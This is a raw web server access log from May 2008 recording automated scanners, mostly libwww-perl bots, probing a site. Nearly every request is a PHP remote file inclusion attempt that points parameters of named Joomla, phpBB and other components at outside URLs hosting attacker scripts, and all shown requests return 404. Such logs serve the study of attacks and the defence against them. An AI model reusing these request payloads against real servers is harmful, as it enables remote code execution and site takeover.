216.239.69.227 - - [11/May/2008:19:59:38 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:59:38 -0700] "GET //skin/zero_vote/error.php?dir=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.239.69.227 - - [11/May/2008:19:59:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.250.121.2 - - [11/May/2008:19:59:59 -0700] "GET /logs/access_080317.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:20:00:24 -0700] "GET /logs/access_080107.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
74.6.27.51 - - [11/May/2008:20:02:04 -0700] "GET /logs/access_071112.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:20:02:04 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.116.44.60 - - [11/May/2008:20:02:33 -0700] "GET /logs/access_080107.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:20:03:04 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:20:03:04 -0700] "GET //citywriter/head.php?path=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:20:03:04 -0700] "GET /logs//citywriter/head.php?path=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.90.127.34 - - [11/May/2008:20:03:23 -0700] "GET /logs/access_080225.log//citywriter/head.php?path=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
67.18.111.18 - - [11/May/2008:20:03:29 -0700] "GET //index2.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.155.232.37 - - [11/May/2008:20:03:54 -0700] "GET /logs/access_080225.log//components/com_simpleboard/file_upload.php?sbp=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.249.16.72 - - [11/May/2008:20:06:27 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.16.72 - - [11/May/2008:20:06:27 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.drcrazy.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.132.204.166 - - [11/May/2008:20:06:27 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
66.132.204.166 - - [11/May/2008:20:06:27 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404